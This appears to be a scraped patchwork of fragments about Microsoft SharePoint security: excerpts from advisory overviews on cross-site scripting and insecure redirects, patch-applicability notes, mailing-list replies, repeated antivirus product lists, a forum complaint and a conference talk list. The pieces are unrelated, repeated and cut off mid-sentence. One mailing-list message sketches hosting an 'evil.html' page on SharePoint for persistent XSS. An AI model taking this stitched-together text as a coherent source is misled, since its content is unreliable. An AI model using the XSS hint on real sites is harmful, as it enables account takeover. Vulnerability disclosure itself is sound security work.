Microsoft Sharepoint
===========
I. Overview
===========
During a penetration test performed by Hacktics' experts, a persistent
cross-site scripting vulnerability was identified in the SharePoint document
handling module. This vulnerability allows attackers to gain control over
valid user accounts, perform operations on their behalf, redirect them to
malicious sites, steal their credentials, and more.
A friendly formatted version of this advisory, including a video
=========
I. Overview
=========
An Insecure Redirect vulnerability has been identified in Microsoft
SharePoint shared infrastructure. This vulnerability allows an attacker
to craft links that contain redirects to malicious sites in the source
parameter used throughout SharePoint portal.
The exploitation technique detailed in this document bypasses the cross
application redirection restriction which normally limits such redirects
Published: 23 October 2009
===========
Description
===========
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.
It was found that the download facility of Microsoft SharePoint Team
Disclosed By Irene Abezgauz, September 13th, 2011
=========
I. Overview
=========
A Cross Site Scripting vulnerability has been identified in Microsoft SharePoint 2007. This vulnerability allows attackers to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more.
A friendly formatted version of this advisory is available at: http://www.seekersec.com/Advisories/SeekerAdvMS04.html
=======
II. Details
Advisory ID: CAU-2008-0002
Release Date: 04/08/2008
Title: Microsoft Windows SharePoint Services Picture Source XSS
Application/OS: Microsoft Windows SharePoint Services 2.0
Topic: A stored Cross Site Scripting (XSS) attack is possible
in Microsoft SharePoint Services 2.0 via picture object
source when adding a picture object to a page.
Vendor Status: Not Notified
Attributes: XSS, Web Service, Microsoft Tuesday
Advisory URL: http://www.caughq.org/advisories/CAU-2008-0002.txt
Author/Email: OneIdBeagl3 <oneidbeagl3 (at) caughq.org>
-------------------------------------------------
MS Patch - MS07-058 Vulnerability in RPC Could Allow Denial of Service (DoS) (933729)
Analysis - Possible security issue exists. Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and install.
-------------------------------------------------
MS Patch - MS07-059 Vulnerability in Windows SharePoint Services 3.0 and Office SharePoint Server 2007 Could Result in Elevation of Privilege Within the SharePoint Site (942017)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS07-060 Vulnerability in Microsoft Word Could Allow Remote Code Execution (942695)
Analysis - SMA does not have this component. Patch will not run successfully.
Hi Adrian,
>It would have been cool to mention Microsoft SharePoint as an example of
>a popular file sharing system that allows persistent XSS through shared
>HTML files. i.e.:
Thanks for pointing this out. I didn't look at SharePoint, actually. I did look at many others, and didn't find any that took any explicit precautions against XSS through shared files. But I thought there was no need to mention any names in the paper.
Francisco
Hi Francisco,
It would have been cool to mention Microsoft SharePoint as an example of
a popular file sharing system that allows persistent XSS through shared
HTML files. i.e.:
https://moss.company.foo/_catalogs/users/Attachments/<userID>/evil.html
https://moss.company.foo/<siteName>/<SectionName>/evil.html
Where 'evil.html' would be a page containing JavaScript. i.e.:
Vulnerability ID: HTB22350
Reference: http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html
Product: Microsoft SharePoint Server 2007
Vendor: Microsoft Corporation
Vulnerable Version: 12.0.0.6421 and Probably Prior Versions
Vendor Notification: 12 April 2010
Vulnerability Type: XSS (Сross Site Sсriрting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)
- McAfee VirusScan Enterprise Linux
- McAfee VirusScan Enterprise for SAP
- McAfee VirusScan Enterprise for Storage
- McAfee VirusScan Commandline
- Mcafee SecurityShield for Microsoft ISA Server
- Mcafee Security for Microsoft Sharepoint
- Mcafee Security for Email Servers
- McAfee Email Gateyway
- McAfee Total Protection for Endpoint
- McAfee Active Virus Defense
- McAfee Active VirusScan
- McAfee VirusScan Enterprise Linux
- McAfee VirusScan Enterprise for SAP
- McAfee VirusScan Enterprise for Storage
- McAfee VirusScan Commandline
- Mcafee SecurityShield for Microsoft ISA Server
- Mcafee Security for Microsoft Sharepoint
- Mcafee Security for Email Servers
- McAfee Email Gateyway
- McAfee Total Protection for Endpoint
- McAfee Active Virus Defense
- McAfee Active VirusScan
Concerns Windows SharePoint Services 2.0 Service Pack 3
Knowledge Base (KB) Articles: KB923643
Date Published: 9/17/2007
Two serious functionality issues after installing this service pack. See following thread for details...
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=2173615&SiteID=1
in brief
i) Pages with customized data view web parts or data view web parts linked to lists on other sites are not accesible. Error message either "access denied" or "Unable to display this Web Part. To troubleshoot the problem, open this Web page in a Windows SharePoint Services-compatible HTML editor such as FrontPage. If the problem persists, contact your Web server administrator."
Avira Antivr Free
Avira AntiVir Premium
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper
-------------------------------------------------
MS Patch - MS08-076 Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
Analysis - Possible security issue exists. Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and install.
-------------------------------------------------
MS Patch - MS08-077 Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
Analysis - SMA does not have this component. Patch will not run successfully
Action - Customers should not be concerned with this issue.
-------------------------------------------------
Installation Instructions: (if applicable)
* avast! 4 Server Edition(impact high, complete bypass)
* avast! 4 Server Edition Plug-ins
* avast! 4 Exchange Server Edition (impact high, complete bypass)
* avast! 4 ISA Server Edition (impact high, complete bypass)
* avast! 4 SharePoint Server Edition (impact high, complete bypass)
* avast! 4 SMTP Server Edition (impact high, complete bypass)
* avast! 4 Lotus Domino Edition (impact high, complete bypass)
* avast! Distributed Network Manager (impact high, complete bypass)
* avast! 4 Professional (impact unknown)
* avast! 4 BART CD (impact unknown)
> In fact the visual clue you gave for a signed document in Word 2007
> shows that in the context for those document properties there
> are also attributes like keywords, category and comments
> which are less misleading to the assumption those properties
> could be part of the signed document. So for example users
> of SharePoint Office Server are acquainted with the
> behavior of showing data that is managed and shown on
> server side in that area above the document.
This might be true, but in my opinion, still builds on either the
assumption
I can’t find hardly any information about this post but this is exactly what happened after I installed service pack 3
What is funny about this error (Pages with customized data view web parts or data view web parts linked to lists on other sites are not accessible. Error message either "access denied" or "Unable to display this Web Part. To troubleshoot the problem, open this Web page in a Windows SharePoint Services-compatible HTML editor such as FrontPage. If the problem persists, contact your Web server administrator.") it only happen when someone access my site from the outside world as long as you access the site entirely you don’t see this error.
I also have a problem with user from my intranet not being able to login at all
If I find a fix ill post it good luck
- Bitdefender Internet Security 2009
- Bitdefender Total Security 2009
- Bitdefender Small Office Security
- Bitdefender for Fileservers
- Bitdefender for Samba
- Bitdefender for Sharepoint
- Bitdefender Security for Exchange
- Bitdefender Security for Mailservers
- Bitdefender for ISA Servers
- Bitdefender Client security
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir & AntiSpam for KEN! 4
Avira WebProtector for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper
- Avira AntiVir Premium
- Avira AntiVir Premium Security Suite
- Avira AntiVir Professional (Desktop)
- Avira AntiVir Server
- Avira AntiVir Exchange
- Avira AntiVir SharePoint
- Avira AntiVir ISA Server
- Avira AntiVir MIMEsweeper
- Avira AntiVir for KEN! 4
- Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
- Avira AntiVir Professional (Unix)
Dear Mr. Poehls,
yes, I can see your point and I agree that there's a risk for an unexperienced user to be spoofed by showing an Author, Time Stamps and State that could have been tampered with after the original owner has signed the document.
But in my opinion, this again emphasizes the need for sufficient knowledge of users about the way how applications may change the appearance of signed documents in a way not intended by the author at the time of signing and that's a question far beyond the considerations concerning the behavior of individual applications like MS Office.
In fact the visual clue you gave for a signed document in Word 2007 shows that in the context for those document properties there are also attributes like keywords, category and comments which are less misleading to the assumption those properties could be part of the signed document. So for example users of SharePoint Office Server are acquainted with the behavior of showing data that is managed and shown on server side in that area above the document. You should also mention that the label on the menu for showing this area reads "Prepare Document for Publishing" which also in my opinion gives a clue that this data is not part of the signed document.
Although I would appreciate if Word 2007 would give more visual clue for the fact that this data isn't part of the signed document, I still believe that this is not a major security issue.
Regards,
H.-D. Naujoks
- Bitdefender Internet Security 2009 (pre update 13/04/2009)
- Bitdefender Total Security 2009 (pre update 13/04/2009)
- Bitdefender Small Office Security (pre update 13/04/2009)
- Bitdefender for Fileservers (pre update 13/04/2009)
- Bitdefender for Samba (pre update 13/04/2009)
- Bitdefender for Sharepoint (pre update 13/04/2009)
- Bitdefender Security for Exchange (pre update 13/04/2009)
- Bitdefender Security for Mailservers (pre update 13/04/2009)
- Bitdefender for ISA Servers (pre update 13/04/2009)
- Bitdefender Client security (pre update 13/04/2009)
- Avira AntiVir Premium
- Avira AntiVir Premium Security Suite
- Avira AntiVir Professional (Desktop)
- Avira AntiVir Server
- Avira AntiVir Exchange
- Avira AntiVir SharePoint
- Avira AntiVir ISA Server
- Avira AntiVir MIMEsweeper
- Avira AntiVir for KEN! 4
- Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
- Avira AntiVir Professional (Unix)
- Symantec Mail Security for SMTP
- Symantec Brightmail Gateway
- Symantec AntiVirus for Network Attached Storage
- Symantec AntiVirus for Caching
- Symantec AntiVirus for Messaging
- Symantec Protection for SharePoint Servers
- Symantec Protection Suite
- Symantec Scan Engine
- Symantec Client Security
- Symantec Endpoint Protection
- Symantec AntiVirus Corporate Edition
Sergey Bratus, Cory Cornelius, Daniel Peebles, & Axel Hansen - Active Fingerprinting of 802.11 APs
Strom Carlson - Why your mother will never care about Linux (a rant)
Stephan Chenette - Ultimate Script Deobfuscation: Browser Hooking versus simulation
Luiz "effffn" Eduardo - a 30,000 feet look at wi-fi, the freezing spot
Adam Cecchetti - Nunchaku: Attack, Defense, and a lot of arm flailing
Dan Griffin - Hacking SharePoint
Zane Lackey & Luis Miras - Mobile Phone Messaging Anti-Forensics
Dan Hubbard - P0wn the Cloud. The good, the bad, and the pugly of Cloud Computing
Tom Stracener - Advanced Cross-Site Scripting Scenarios, Filter Evasion and Browser Exploits
Thomas Ristenpart - Privacy-preserving Location Tracking of Lost or Stolen Devices: Cryptographic Techniques and Replacing Trusted Third Parties with DHTs
Dean Pierce - Seeds of Contempt
- Avira AntiVir Premium (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Premium Security Suite (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Professional (Desktop) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Exchange (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir SharePoint (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir ISA Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir MIMEsweeper (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir for KEN! 4 (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
- Avira AntiVir Professional (Unix) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
|
